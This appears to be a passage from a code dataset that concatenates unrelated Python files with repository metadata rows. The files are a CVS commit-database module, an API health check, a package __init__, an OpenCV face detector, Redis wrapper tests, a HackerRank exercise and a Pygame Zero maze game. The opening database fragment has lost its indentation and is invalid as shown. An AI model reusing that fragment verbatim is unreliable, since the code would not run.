commit.SetTime(dbi.TicksFromDateTime(dbCI_When))
commit.SetFileID(dbFileID)
commit.SetDirectoryID(dbDirID)
commit.SetRevision(dbRevision)
commit.SetRepositoryID(dbRepositoryID)
commit.SetAuthorID(dbAuthorID)
commit.SetBranchID(dbBranchID)
commit.SetPlusCount(dbAddedLines)
commit.SetMinusCount(dbRemovedLines)
commit.SetDescriptionID(dbDescID)
query.AddCommit(commit)
def CheckCommit(self, commit):
repository_id = self.GetRepositoryID(commit.GetRepository(), 0)
if repository_id == None:
return None
dir_id = self.GetDirectoryID(commit.GetDirectory(), 0)
if dir_id == None:
return None
file_id = self.GetFileID(commit.GetFile(), 0)
if file_id == None:
return None
sql = "SELECT type, ci_when, whoid, repositoryid, dirid, fileid, " \
"revision, stickytag, branchid, addedlines, removedlines, " \
"descid "\
" FROM %s WHERE "\
" repositoryid=%%s "\
" AND dirid=%%s"\
" AND fileid=%%s"\
" AND revision=%%s"\
% (self.GetCommitsTable())
sql_args = (repository_id, dir_id, file_id, commit.GetRevision())
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(ci_type, ci_when, who_id, repository_id,
dir_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id) = cursor.fetchone()
except TypeError:
return None
return commit
def sql_delete(self, table, key, value, keep_fkey = None):
sql = "DELETE FROM %s WHERE %s=%%s" % (table, key)
sql_args = (value, )
if keep_fkey:
sql += " AND %s NOT IN (SELECT %s FROM %s WHERE %s = %%s)" \
% (key, keep_fkey, self.GetCommitsTable(), keep_fkey)
sql_args = (value, value)
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
def sql_purge(self, table, key, fkey, ftable):
sql = "DELETE FROM %s WHERE %s NOT IN (SELECT %s FROM %s)" \
% (table, key, fkey, ftable)
cursor = self.db.cursor()
cursor.execute(sql)
def PurgeRepository(self, repository):
rep_id = self.GetRepositoryID(repository, auto_set=0)
if not rep_id:
raise UnknownRepositoryError("Unknown repository '%s'"
% (repository))
if (self._version >= 1):
self.sql_delete('repositories', 'id', rep_id)
self.sql_purge('commits', 'repositoryid', 'id', 'repositories')
self.sql_purge('files', 'id', 'fileid', 'commits')
self.sql_purge('dirs', 'id', 'dirid', 'commits')
self.sql_purge('branches', 'id', 'branchid', 'commits')
self.sql_purge('descs', 'id', 'descid', 'commits')
self.sql_purge('people', 'id', 'whoid', 'commits')
else:
sql = "SELECT type, ci_when, whoid, repositoryid, dirid, " \
"fileid, revision, stickytag, branchid, addedlines, " \
"removedlines, descid "\
" FROM checkins WHERE repositoryid=%s"
sql_args = (rep_id, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
checkins = []
while 1:
try:
(ci_type, ci_when, who_id, repository_id,
dir_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id) = \
cursor.fetchone()
except TypeError:
break
checkins.append([file_id, dir_id, branch_id,
description_id, who_id])
#self.sql_delete('repositories', 'id', rep_id)
self.sql_delete('checkins', 'repositoryid', rep_id)
for checkin in checkins:
self.sql_delete('files', 'id', checkin[0], 'fileid')
self.sql_delete('dirs', 'id', checkin[1], 'dirid')
self.sql_delete('branches', 'id', checkin[2], 'branchid')
self.sql_delete('descs', 'id', checkin[3], 'descid')
self.sql_delete('people', 'id', checkin[4], 'whoid')
# Reset all internal id caches. We could be choosier here,
# but let's just be as safe as possible.
self._get_cache = {}
self._get_id_cache = {}
self._desc_id_cache = {}
class DatabaseVersionError(Exception):
pass
class UnknownRepositoryError(Exception):
pass
## the Commit class holds data on one commit, the representation is as
## close as possible to how it should be committed and retrieved to the
## database engine
class Commit:
## static constants for type of commit
CHANGE = 0
ADD = 1
REMOVE = 2
def __init__(self):
self.__directory = ''
self.__file = ''
self.__repository = ''
self.__revision = ''
self.__author = ''
self.__branch = ''
self.__pluscount = ''
self.__minuscount = ''
self.__description = ''
self.__gmt_time = 0.0
self.__type = Commit.CHANGE
def SetRepository(self, repository):
self.__repository = repository
def GetRepository(self):
return self.__repository
def SetDirectory(self, dir):
self.__directory = dir
def GetDirectory(self):
return self.__directory
def SetFile(self, file):
self.__file = file
def GetFile(self):
return self.__file
def SetRevision(self, revision):
self.__revision = revision
def GetRevision(self):
return self.__revision
def SetTime(self, gmt_time):
if gmt_time is None:
### We're just going to assume that a datestamp of The Epoch
### ain't real.
self.__gmt_time = 0.0
else:
self.__gmt_time = float(gmt_time)
def GetTime(self):
return self.__gmt_time and self.__gmt_time or None
def SetAuthor(self, author):
self.__author = author
def GetAuthor(self):
return self.__author
def SetBranch(self, branch):
self.__branch = branch or ''
def GetBranch(self):
return self.__branch
def SetPlusCount(self, pluscount):
self.__pluscount = pluscount
def GetPlusCount(self):
return self.__pluscount
def SetMinusCount(self, minuscount):
self.__minuscount = minuscount
def GetMinusCount(self):
return self.__minuscount
def SetDescription(self, description):
self.__description = description
def GetDescription(self):
return self.__description
def SetTypeChange(self):
self.__type = Commit.CHANGE
def SetTypeAdd(self):
self.__type = Commit.ADD
def SetTypeRemove(self):
self.__type = Commit.REMOVE
def GetType(self):
return self.__type
def GetTypeString(self):
if self.__type == Commit.CHANGE:
return 'Change'
elif self.__type == Commit.ADD:
return 'Add'
elif self.__type == Commit.REMOVE:
return 'Remove'
## LazyCommit overrides a few methods of Commit to only retrieve
## its properties as they are needed
class LazyCommit(Commit):
def __init__(self, db):
Commit.__init__(self)
self.__db = db
def SetFileID(self, dbFileID):
self.__dbFileID = dbFileID
def GetFileID(self):
return self.__dbFileID
def GetFile(self):
return self.__db.GetFile(self.__dbFileID)
def SetDirectoryID(self, dbDirID):
self.__dbDirID = dbDirID
def GetDirectoryID(self):
return self.__dbDirID
def GetDirectory(self):
return self.__db.GetDirectory(self.__dbDirID)
def SetRepositoryID(self, dbRepositoryID):
self.__dbRepositoryID = dbRepositoryID
def GetRepositoryID(self):
return self.__dbRepositoryID
def GetRepository(self):
return self.__db.GetRepository(self.__dbRepositoryID)
def SetAuthorID(self, dbAuthorID):
self.__dbAuthorID = dbAuthorID
def GetAuthorID(self):
return self.__dbAuthorID
def GetAuthor(self):
return self.__db.GetAuthor(self.__dbAuthorID)
def SetBranchID(self, dbBranchID):
self.__dbBranchID = dbBranchID
def GetBranchID(self):
return self.__dbBranchID
def GetBranch(self):
return self.__db.GetBranch(self.__dbBranchID)
def SetDescriptionID(self, dbDescID):
self.__dbDescID = dbDescID
def GetDescriptionID(self):
return self.__dbDescID
def GetDescription(self):
return self.__db.GetDescription(self.__dbDescID)
## QueryEntry holds data on one match-type in the SQL database
## match is one of: "exact", "like", "glob", "regex", or "notregex"
class QueryEntry:
def __init__(self, data, match):
self.data = data
self.match = match
## CheckinDatabaseQuery is an object which contains the search
## parameters for a query to the Checkin Database and -- after the
## query is executed -- the data returned by the query.
class CheckinDatabaseQuery:
def __init__(self):
## sorting
self.sort = "date"
## repository to query
self.repository_list = []
self.branch_list = []
self.directory_list = []
self.file_list = []
self.author_list = []
self.comment_list = []
## date range in DBI 2.0 timedate objects
self.from_date = None
self.to_date = None
## limit on number of rows to return
self.limit = None
self.limit_reached = 0
## list of commits -- filled in by CVS query
self.commit_list = []
## commit_cb provides a callback for commits as they
## are added
self.commit_cb = None
## has this query been run?
self.executed = 0
def SetRepository(self, repository, match = "exact"):
self.repository_list.append(QueryEntry(repository, match))
def SetBranch(self, branch, match = "exact"):
self.branch_list.append(QueryEntry(branch, match))
def SetDirectory(self, directory, match = "exact"):
self.directory_list.append(QueryEntry(directory, match))
def SetFile(self, file, match = "exact"):
self.file_list.append(QueryEntry(file, match))
def SetAuthor(self, author, match = "exact"):
self.author_list.append(QueryEntry(author, match))
def SetComment(self, comment, match = "exact"):
self.comment_list.append(QueryEntry(comment, match))
def SetSortMethod(self, sort):
self.sort = sort
def SetFromDateObject(self, ticks):
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetToDateObject(self, ticks):
self.to_date = dbi.DateTimeFromTicks(ticks)
def SetFromDateHoursAgo(self, hours_ago):
ticks = time.time() - (3600 * hours_ago)
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetFromDateDaysAgo(self, days_ago):
ticks = time.time() - (86400 * days_ago)
self.from_date = dbi.DateTimeFromTicks(ticks)
def SetToDateDaysAgo(self, days_ago):
ticks = time.time() - (86400 * days_ago)
self.to_date = dbi.DateTimeFromTicks(ticks)
def SetLimit(self, limit):
self.limit = limit;
def AddCommit(self, commit):
self.commit_list.append(commit)
def SetExecuted(self):
self.executed = 1
def SetLimitReached(self):
self.limit_reached = 1
def GetLimitReached(self):
assert self.executed
return self.limit_reached
def GetCommitList(self):
assert self.executed
return self.commit_list
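## Illustrative query construction (comments only; uses the setters above and
## the entrypoints defined below -- 'cfg' stands for the usual ViewVC config
## object and the repository path is a made-up placeholder):
##   query = CreateCheckinQuery()
##   query.SetRepository('/var/cvsroot')
##   query.SetAuthor('jrandom', match='exact')
##   query.SetFromDateDaysAgo(7)
##   query.SetLimit(100)
##   db = ConnectDatabaseReadOnly(cfg)
##   db.RunQuery(query)
##   commits = query.GetCommitList()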
##
## entrypoints
##
def CreateCommit():
return Commit()
def CreateCheckinQuery():
return CheckinDatabaseQuery()
def ConnectDatabase(cfg, readonly=0):
if readonly:
user = cfg.cvsdb.readonly_user
passwd = cfg.cvsdb.readonly_passwd
else:
user = cfg.cvsdb.user
passwd = cfg.cvsdb.passwd
db = CheckinDatabase(cfg.cvsdb.host, cfg.cvsdb.port, user, passwd,
cfg.cvsdb.database_name)
db.Connect()
return db
def ConnectDatabaseReadOnly(cfg):
return ConnectDatabase(cfg, 1)
def GetCommitListFromRCSFile(repository, path_parts, revision=None):
commit_list = []
directory = "/".join(path_parts[:-1])
file = path_parts[-1]
revs = repository.itemlog(path_parts, revision, vclib.SORTBY_DEFAULT,
0, 0, {"cvs_pass_rev": 1})
for rev in revs:
commit = CreateCommit()
commit.SetRepository(repository.rootpath)
commit.SetDirectory(directory)
commit.SetFile(file)
commit.SetRevision(rev.string)
commit.SetAuthor(rev.author)
commit.SetDescription(rev.log)
commit.SetTime(rev.date)
if rev.changed:
# extract the plus/minus and drop the sign
plus, minus = rev.changed.split()
commit.SetPlusCount(plus[1:])
commit.SetMinusCount(minus[1:])
if rev.dead:
commit.SetTypeRemove()
else:
commit.SetTypeChange()
else:
commit.SetTypeAdd()
commit_list.append(commit)
# if revision is on a branch which has at least one tag
if len(rev.number) > 2 and rev.branches:
commit.SetBranch(rev.branches[0].name)
return commit_list
def GetUnrecordedCommitList(repository, path_parts, db):
commit_list = GetCommitListFromRCSFile(repository, path_parts)
unrecorded_commit_list = []
for commit in commit_list:
result = db.CheckCommit(commit)
if not result:
unrecorded_commit_list.append(commit)
return unrecorded_commit_list
_re_likechars = re.compile(r"([_%\\])")
def EscapeLike(literal):
"""Escape literal string for use in a MySQL LIKE pattern"""
return re.sub(_re_likechars, r"\\\1", literal)
def FindRepository(db, path):
"""Find repository path in database given path to subdirectory
Returns normalized repository path and relative directory path"""
path = os.path.normpath(path)
dirs = []
while path:
rep = os.path.normcase(path)
if db.GetRepositoryID(rep, 0) is None:
path, pdir = os.path.split(path)
if not pdir:
return None, None
dirs.append(pdir)
else:
break
dirs.reverse()
return rep, dirs
def CleanRepository(path):
"""Return normalized top-level repository path"""
return os.path.normcase(os.path.normpath(path))
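# --- Usage sketch (not part of the module above) ---
# Demonstrates EscapeLike() and the fnmatch-based glob normalization that
# SQLQueryListString() relies on. Pure-function demo only; it does not touch
# the database classes, and the guard keeps it from running on import.
if __name__ == '__main__':
    import fnmatch as _fnmatch

    # LIKE metacharacters are escaped with a backslash.
    print(EscapeLike("100%_done"))            # -> 100\%\_done

    # Depending on the Python version, fnmatch.translate() may emit '\Z(?ms)'
    # instead of '$' and omit the leading '^', which is exactly what
    # SQLQueryListString() normalizes for glob matches.
    pattern = _fnmatch.translate("*.py")
    if not pattern.startswith('^'):
        pattern = '^' + pattern
    if pattern.endswith('\\Z(?ms)'):
        pattern = pattern[:-7] + '$'
    print(pattern)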
| 32.201826 | 79 | 0.565998 |
5f1710116d618a1f2c843a26b2cfab775e662153 | 515 | py | Python | SearchAPI/CMR/Health.py | asfadmin/Discovery-SearchAPI | d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd | ["BSD-3-Clause"] | null | null | null | SearchAPI/CMR/Health.py | asfadmin/Discovery-SearchAPI | d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd | ["BSD-3-Clause"] | null | null | null | SearchAPI/CMR/Health.py | asfadmin/Discovery-SearchAPI | d5e0b3d3a6a74c7f243ddc74a2316cd7b7380edd | ["BSD-3-Clause"] | null | null | null |
import requests
import logging
import json
from SearchAPI.asf_env import get_config
def get_cmr_health():
cfg = get_config()
try:
r = requests.get(cfg['cmr_base'] + cfg['cmr_health'], timeout=10)
d = {'host': cfg['cmr_base'], 'health': json.loads(r.text)}
except Exception as e:
logging.debug(e)
d = {'host': cfg['cmr_base'], 'error': {
'display': 'ASF is experiencing errors loading data. Please try again later.',
'raw': f'{e}'}}
return d
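# --- Test sketch (not part of the module above) ---
# One way to exercise get_cmr_health() without network access or a real
# deployment config, assuming the module is importable as SearchAPI.CMR.Health
# (the path this file sits at). The config keys mirror the ones read above;
# the URL and JSON body are made-up placeholders.
def _demo_health_check():
    from unittest import mock
    fake_cfg = {'cmr_base': 'https://cmr.example.test', 'cmr_health': '/health'}
    with mock.patch('SearchAPI.CMR.Health.get_config', return_value=fake_cfg), \
         mock.patch('SearchAPI.CMR.Health.requests.get') as fake_get:
        fake_get.return_value.text = '{"ok": true}'
        from SearchAPI.CMR.Health import get_cmr_health
        return get_cmr_health()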
| 30.294118 | 91 | 0.603883 |
de160c5607417762d7f9b804b462182469cb1b31 | 449 | py | Python | creme/ensemble/__init__.py | Raul9595/creme | 39cec7ac27ccd40ff0a7bdd6bceaf7ce25c1a8da | ["BSD-3-Clause"] | 1 | 2020-07-27T03:06:46.000Z | 2020-07-27T03:06:46.000Z | creme/ensemble/__init__.py | 2torus/creme | bcc5e2a0155663a1f0ba779c68f23456695bcb54 | ["BSD-3-Clause"] | 1 | 2022-02-10T06:24:42.000Z | 2022-02-10T06:24:42.000Z | creme/ensemble/__init__.py | igorol/creme | 60977c4accfdca08cfd76a162095ff738ef87281 | ["BSD-3-Clause"] | 1 | 2021-04-16T08:27:14.000Z | 2021-04-16T08:27:14.000Z |
"""
A module for ensemble learning.
"""
from .bagging import BaggingClassifier
from .bagging import BaggingRegressor
from .grouping import GroupRegressor
from .hedging import HedgeBinaryClassifier
from .hedging import HedgeRegressor
from .stacking import StackingBinaryClassifier
__all__ = [
'BaggingClassifier',
'BaggingRegressor',
'GroupRegressor',
'HedgeBinaryClassifier',
'HedgeRegressor',
'StackingBinaryClassifier'
]
| 22.45 | 46 | 0.777283 |
695526854b3bdc830a9a9b1e14624a183c8db031 | 1,269 | py | Python | modules/face_morphs/face_finder.py | GrzegorzKrug/face_morph | 64e5e47207d30ac8968a0b1b73e11a8ae74b3fec | ["Apache-2.0"] | null | null | null | modules/face_morphs/face_finder.py | GrzegorzKrug/face_morph | 64e5e47207d30ac8968a0b1b73e11a8ae74b3fec | ["Apache-2.0"] | null | null | null | modules/face_morphs/face_finder.py | GrzegorzKrug/face_morph | 64e5e47207d30ac8968a0b1b73e11a8ae74b3fec | ["Apache-2.0"] | null | null | null |
import numpy as np
import glob
import cv2
import os
eye_cascade = cv2.CascadeClassifier("haarcascade_eye.xml")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
avatars = glob.glob("avatars/*png")
avatars.sort()
export_dir = "exports"
face_count = 0
MAX_SIZE = 256
os.makedirs(export_dir, exist_ok=True)
for avatar in avatars:
bgr_img = cv2.imread(avatar)
    # numpy/OpenCV image shape is (height, width, channels)
    height, width, channels = bgr_img.shape
    if width > MAX_SIZE or height > MAX_SIZE:
        width = MAX_SIZE if width > MAX_SIZE else width
        height = MAX_SIZE if height > MAX_SIZE else height
        dim = (width, height)  # cv2.resize expects (width, height)
        bgr_img = cv2.resize(bgr_img, dim)
gray_image = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray_image, 1.1, 3)
for (x, y, w, h) in faces:
face_count += 1
pt1 = (x, y)
pt2 = (x + w, y + h)
cv2.rectangle(bgr_img, pt1, pt2, (0, 255, 55), 2)
eyes = eye_cascade.detectMultiScale(gray_image, 1.2, 8)
for (x, y, w, h) in eyes:
pt1 = (x, y)
pt2 = (x + w, y + h)
cv2.rectangle(bgr_img, pt1, pt2, (255, 85, 0), 2)
cv2.imwrite(os.path.join(export_dir, os.path.basename(avatar)), bgr_img)
print(f"Faces found: {face_count}")
| 28.2 | 76 | 0.651694 |
417dd3e9f81bfa959c226606727b4d97df184ef0 | 4,798 | py | Python | tests/unittests/services/utils/test_db.py | hackaugusto/scenario-player | 0701bb986f47e1ec4a4fb7a469157826da1993e2 | ["MIT"] | null | null | null | tests/unittests/services/utils/test_db.py | hackaugusto/scenario-player | 0701bb986f47e1ec4a4fb7a469157826da1993e2 | ["MIT"] | null | null | null | tests/unittests/services/utils/test_db.py | hackaugusto/scenario-player | 0701bb986f47e1ec4a4fb7a469157826da1993e2 | ["MIT"] | null | null | null |
import json
from unittest import mock
import pytest
from scenario_player.services.utils.factories import construct_flask_app
from scenario_player.services.utils.db import JSONRedis
from scenario_player.exceptions.db import CorruptedDBEntry
db_import_path = 'scenario_player.services.utils.db'
@pytest.fixture
def app():
app = construct_flask_app(test_config={"TESTING": True})
with app.app_context():
yield
@mock.patch(f'{db_import_path}.Redis.hmget')
@mock.patch(f'{db_import_path}.Redis.hmset')
class TestJSONRedis:
@mock.patch(f'{db_import_path}.JSONRedis.set_json')
def test_tset_method_calls_set_json_with_table_attr_and_given_encode_kwargs(self, mock_set_json, _, __, app):
instance = JSONRedis('test_table')
instance.tset('my-key', {'key': 'value'})
expected_args = ('test_table', 'my-key', {'key': 'value'})
mock_set_json.assert_called_once()
actual_args, _ = mock_set_json.call_args
assert actual_args == expected_args
@mock.patch(f'{db_import_path}.JSONRedis.get_json')
def test_tget_method_calls_get_json_with_table_attr_and_given_decode_kwargs(self, mock_get_json, _, __, app):
instance = JSONRedis('test_table')
instance.tget('my-key')
expected_args = ('test_table', 'my-key')
mock_get_json.assert_called_once()
actual_args, _ = mock_get_json.call_args
assert actual_args == expected_args
def test_set_json_calls_hmset_method_with_json_encoded_string(self, patched_hmset, __, app):
instance = JSONRedis('test_table')
instance.set_json('test_table', 'key', {'k': 'v'})
patched_hmset.assert_called_once_with('test_table', {"key": '{"k": "v"}'})
@mock.patch(f'{db_import_path}.json.loads')
def test_get_json_applies_decoding_options_to_json_string(self, mock_loads, _, patched_hmget, app):
patched_hmget.return_value = '{"sth": "blah"}'
instance = JSONRedis('test_table', decoding_options={'option': 'value'})
instance.get_json('test_table', 'key')
mock_loads.assert_called_once_with('{"sth": "blah"}', option='value')
@mock.patch(f'{db_import_path}.json.dumps')
def test_set_json_applies_encoding_options_to_json_string(self, mock_dumps, _, __, app):
instance = JSONRedis('test_table', encoding_options={'option': 'value'})
instance.set_json('test_table', 'key', {'sth': 'blah'})
mock_dumps.assert_called_once_with({'sth': 'blah'}, option='value')
@mock.patch(f'{db_import_path}.json.dumps')
def test_encode_kwargs_passed_directly_to_set_json_take_precedence_over_encoding_options_stored_in_instance(self, mock_dumps, _, __, app):
instance = JSONRedis('test_table', encoding_options={'option': 'value'})
instance.set_json('test_table', 'key', {'sth': 'blah'}, option='nugget')
mock_dumps.assert_called_once_with({'sth': 'blah'}, option='nugget')
@mock.patch(f'{db_import_path}.json.loads')
def test_decode_kwargs_passed_directly_to_get_json_take_precedence_over_decoding_options_stored_in_instance(self, mock_loads, _, patched_hmget, app):
patched_hmget.return_value = '{"sth": "blah"}'
instance = JSONRedis('test_table', decoding_options={'option': 'value'})
instance.get_json('test_table', 'key', option='nugget')
mock_loads.assert_called_once_with('{"sth": "blah"}', option='nugget')
@mock.patch(f'{db_import_path}.json.dumps', side_effect=ValueError('from mock'))
def test_tset_method_propagates_ValueError_during_json_encoding_from_downstream(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(ValueError, match=r".*from mock.*"):
instance.tset('key', {'k': 'v'})
@mock.patch(f'{db_import_path}.json.loads', side_effect=json.JSONDecodeError('from mock', "", 0))
def test_tget_method_raises_CorruptedDBEntry_exception_if_JSONDecodeError_is_raised_downstream(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(CorruptedDBEntry):
instance.tget('key')
@mock.patch(f'{db_import_path}.json.dumps', side_effect=ValueError('from mock'))
def test_set_json_propagates_ValueError_during_json_encoding(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(ValueError, match=r".*from mock.*"):
instance.set_json('test_table', 'key', {"k": "v"})
@mock.patch(f'{db_import_path}.json.loads', side_effect=json.JSONDecodeError('from mock', "", 0))
def test_get_json_propagates_JSONDecodeError(self, _, __, ___, app):
instance = JSONRedis('test_table')
with pytest.raises(json.JSONDecodeError, match=r".*from mock.*"):
instance.get_json('test_table', 'key')
| 48.464646 | 153 | 0.708003 |
04a6dff3f9df32462662b508919ebd8776d83ce5 | 447 | py | Python | 30 Days of Code/Day 17 More Exceptions/Solution.py | iamnambiar/HackerRank-Solutions | 6fdcab79b18e66a6d7278b979a8be087f8f6c696 | ["MIT"] | 2 | 2020-04-06T10:32:08.000Z | 2021-04-23T04:32:45.000Z | 30 Days of Code/Day 17 More Exceptions/Solution.py | iamnambiar/HackerRank-Solutions | 6fdcab79b18e66a6d7278b979a8be087f8f6c696 | ["MIT"] | null | null | null | 30 Days of Code/Day 17 More Exceptions/Solution.py | iamnambiar/HackerRank-Solutions | 6fdcab79b18e66a6d7278b979a8be087f8f6c696 | ["MIT"] | null | null | null |
# https://www.hackerrank.com/challenges/30-more-exceptions/problem
#Write your code here
class Calculator:
def power(self, n, p):
if n<0 or p<0:
raise Exception("n and p should be non-negative")
return n**p
myCalculator=Calculator()
T=int(input())
for i in range(T):
n,p = map(int, input().split())
try:
ans=myCalculator.power(n,p)
print(ans)
except Exception as e:
print(e)
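# Sample run (illustrative input/output, not part of the submission):
#   input : 2        -> T, the number of test cases
#           3 5      -> prints 243 (3**5)
#           -1 2     -> prints "n and p should be non-negative"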
| 24.833333 | 66 | 0.608501 |
282bef162a1e3575d46faa964f5eb67bf834654a | 6,956 | py | Python | mazegame/mazegame2.py | kantel/pygamezero | 93c202a2bd5bcc827eabe952575b7714b36e4b9d | ["MIT"] | 1 | 2020-06-29T00:36:07.000Z | 2020-06-29T00:36:07.000Z | mazegame/mazegame2.py | kantel/pygamezero | 93c202a2bd5bcc827eabe952575b7714b36e4b9d | ["MIT"] | null | null | null | mazegame/mazegame2.py | kantel/pygamezero | 93c202a2bd5bcc827eabe952575b7714b36e4b9d | ["MIT"] | null | null | null |
# Simple Maze Game with Pygame Zero (v 1.2), Python 3
# Stage 2 (object orientation)
# Assets: DawnLike tileset (CC BY 4.0) by DawnBringer and DragonDePlatino
# (https://opengameart.org/content/dawnlike-16x16-universal-rogue-like-tileset-v181)
# Jörg Kantel 2022 (MIT license)
import pgzrun
# WIDTH: 25 tiles of 16 pixels each + a 20-pixel margin on each side
WIDTH = 440
# HEIGHT: 25 tiles of 16 pixels each + a 20-pixel margin on each side
HEIGHT = 440
TITLE = "Mazegame Stage 2"
WALL = 63
DOOR = 62
CHEST = 22
margin_x = 20
margin_y = 20
sz = 16 # Step-/Tile-Size
maze_map = [[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,63,63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,63,63,63,63,63,-1,-1,63,63,-1,-1,-1,-1,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,22,-1,63,63,63,63,63],
[63,-1,-1,63,63,63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,63,63,63,63,63,-1,22,63],
[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,-1,-1,63],
[63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63],
[63,63,63,63,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,22,-1,-1,63,63,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,63,63,63,63,63,63,63,63,63,63,63,63,-1,-1,63,63,63,63,63],
[63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,63,63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,63],
[63,63,63,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62],
[63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63]]
class Wall(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Door(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.status = "closed"
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Chest(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.score = 100
def set_screen_pos(self, x, y):
self.x = x
self.y = y
self.topleft = margin_x + self.x*sz, margin_y + self.y*sz
class Rogue(Actor):
def __init__(self, image):
Actor.__init__(self, image)
self.image = image
self.xpos = 1 # x-Position im Grid
self.ypos = 1 # y-Position im Grid
        # Place the rogue at its starting position without animation
self.topleft = margin_x + self.xpos*sz, margin_y + self.ypos*sz
self.dir = None
self.score = 0
def set_screen_pos(self):
x, y = margin_x + self.xpos*sz + 0.5*sz, margin_y + self.ypos*sz + 0.5*sz
animate(self, duration = .2, pos = (x, y))
def walk(self):
if self.dir == "left":
move_to_x = self.xpos - 1
move_to_y = self.ypos
self.dir = None
            # Collision detection
if (move_to_x, move_to_y) not in walls_pos:
self.xpos -= 1
self.set_screen_pos()
elif self.dir == "right":
move_to_x = self.xpos + 1
move_to_y = self.ypos
self.dir = None
            # Collision detection
if (move_to_x, move_to_y) not in walls_pos:
self.xpos += 1
self.set_screen_pos()
elif self.dir == "up":
move_to_x = self.xpos
move_to_y = self.ypos - 1
self.dir = None
            # Collision detection
if (move_to_x, move_to_y) not in walls_pos:
self.ypos -= 1
self.set_screen_pos()
elif self.dir == "down":
move_to_x = self.xpos
move_to_y = self.ypos + 1
self.dir = None
            # Collision detection
if (move_to_x, move_to_y) not in walls_pos:
self.ypos += 1
self.set_screen_pos()
rogue = Rogue("rogue16")
walls = []
chests = []
doors = []
walls_pos = []
chests_pos = []
def init_game():
for y in range(25):
for x in range(25):
if maze_map[y][x] == WALL:
wall = Wall("wall16")
wall.set_screen_pos(x, y)
walls.append(wall)
walls_pos.append((x, y))
if maze_map[y][x] == DOOR:
door = Door("door16")
door.set_screen_pos(x, y)
doors.append(door)
walls_pos.append((x, y))
if maze_map[y][x] == CHEST:
chest = Chest("chest16")
chest.set_screen_pos(x, y)
chests.append(chest)
chests_pos.append((x, y))
def update():
rogue.walk()
    # Iterate over a copy of the list: removing items from a list while
    # iterating over it can skip elements.
    for chest in chests[:]:
        if rogue.colliderect(chest):
            rogue.score += chest.score
            chests.remove(chest)
print(rogue.score)
def draw():
screen.fill((90, 90, 90))
for wall in walls:
wall.draw()
for door in doors:
door.draw()
for chest in chests:
chest.draw()
rogue.draw()
def on_key_down(key):
if key == keys.LEFT:
rogue.dir = "left"
elif key == keys.RIGHT:
rogue.dir = "right"
elif key == keys.UP:
rogue.dir = "up"
elif key == keys.DOWN:
rogue.dir = "down"
    if key == keys.ESCAPE:  # ESCAPE quits the game
print("Bye, bye, Baby!")
quit()
init_game()
pgzrun.go()
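# Worked example of the grid-to-screen mapping used above (illustrative only):
# with margin_x = margin_y = 20 and sz = 16, a wall at grid (x=3, y=2) gets
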